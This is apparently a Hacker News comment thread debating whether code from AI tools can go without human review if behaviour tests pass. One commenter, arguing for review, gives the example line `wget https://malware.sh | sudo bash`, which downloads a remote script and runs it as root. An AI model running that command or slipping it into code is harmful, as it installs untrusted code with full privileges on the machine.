top | item 46685251

(no title)

tuckwat | 1 month ago

> You no longer need to review the code. Or instruct the model at the level of files or functions. You can test behaviors instead.

Maybe for a personal project but this doesn't work in a multi-dev environment with paying customers. In my experience, paying attention to architecture and the code itself results in a much more pliable application that can be evolved.

discuss

order

SilenN|1 month ago

Agree. And with the comments in the thread.

I'll caveat my statement, with AI ready repos. Meaning those with good documentation, good comments (ex. avoiding Chestertons fence), comprehensive interface tests, Sentry, CI/CD, etc.

Established repos are harder because a) the marginal cost of something going wrong is much higher b) there's more dependencies c) this makes it harder to 'comprehensively' ensure the AI didn't mess anything up

I say this in the article

> There's no "right answer." The only way to create your best system is to create it yourself by being in the loop. Best is biased by taste and experience. Experiment, iterate, and discover what works for you.

Try pushing the boundary. It's like figuring out the minimum amount of sleep you need. You undersleep and oversleep a couple times, but you end up with a good idea.

To be clear, I'm not advocating for canonical 'vibe coding'. Just that what it means to be a good engineer has changed again. 1) Being able to quickly create a mental map of code at the speed of changes, 2) debugging and refactoring 3) prompting, 4) and ensuring everything works (verifiability) are now the most valuable skills.

We should also focus more on the derivative than our point in time.

creshal|1 month ago

> Just that what it means to be a good engineer has changed again.

And not even by much, 1/2/4 have always been signs of good engineers.

worksonmine|1 month ago

> Being able to quickly create a mental map of code at the speed of changes

I get the feeling you're intentionally being a parody with that line.

> and ensuring everything works (verifiability) are now the most valuable skills.

Something might look like it works, and pass all the tests, but it could still be running `wget https://malware.sh | sudo bash`. Without knowing that it's there how will your tests catch it?

My example is exaggerated and in the real world it will be more subtle and less nefarious, but just as dangerous. This has already happened, OpenCode is a recent such example. It was on the front page a few days ago, you should check it out. Of course you have to review the code. Who are you trying to fool?

> We should also focus more on the derivative than our point in time.

So why are you selling it as possible in "our point in time" (are you getting paid per buzzword?). I read the quote as "Yes, I'm full of shit, but consider the possibilities and stop being a buzzkill bro".

Extremely depressing to see this happening to the craft I used to love.

madrox|1 month ago

It's doesn't work...yet. I agree my stomach churns a little at this sentence. However, paying customers care about reliability and performance. Code review helps that today, but it's only a matter of time before it is more performative than useful in serving those goals at the cost of velocity.

AIorNot|1 month ago

the (multi) billon dollar question is when that will happen, I think, case in point:

the OP is a kid in his 20s describing the history of the last 3 years or so of small scale AI Development (https://www.linkedin.com/in/silen-naihin/details/experience/)

How does that compare to those of us with 15-50 years of software engineering experience working on giant codebases that have years of domain rules, customers and use cases etc.

When will AI be ready? Microsoft tried to push AI into big enterprise, Anthropic is doing a better job -but its all still in infancy

Personally for me I hope it won't be ready for another 10 years so I can retire before it takes over :)

I remember when folks on HN all called this AI stuff made up

jasondigitized|1 month ago

Na. Most successful startups don't worry about super tight code up front and hack the shit out of something and support tens of thousands of user with completely garbage code and architecture.

I know this because I am at one now making an ungodly amount of money with 50k active users a day on a complete mudball monothilic node + react + postgres app used by multiple Fortune 100 companies.

nzoschke|1 month ago

Counter argument...

High velocity teams also observe production system telemetry and use error rates, tracing and more to maintain high SLAs for customers.

They set a "budget" and use feature flagging to release risky code and roll back or roll forward based on metrics.

So agentic coding can feed back on observed behaviors in production too.

ithkuil|1 month ago

It's definitely an area where we'll all learn a lot in the upcoming years.

But we have to use this "innovation budget" in a careful way.

zdragnar|1 month ago

Everyone who is responsible for SOC 2 at their company just felt a disturbance.

Honestly, I can't wait for AI: development practices to mature, because I'm really tired of the fake hype and missteps getting in the way of things.

LtWorf|1 month ago

Why would AI not fall for fake hype?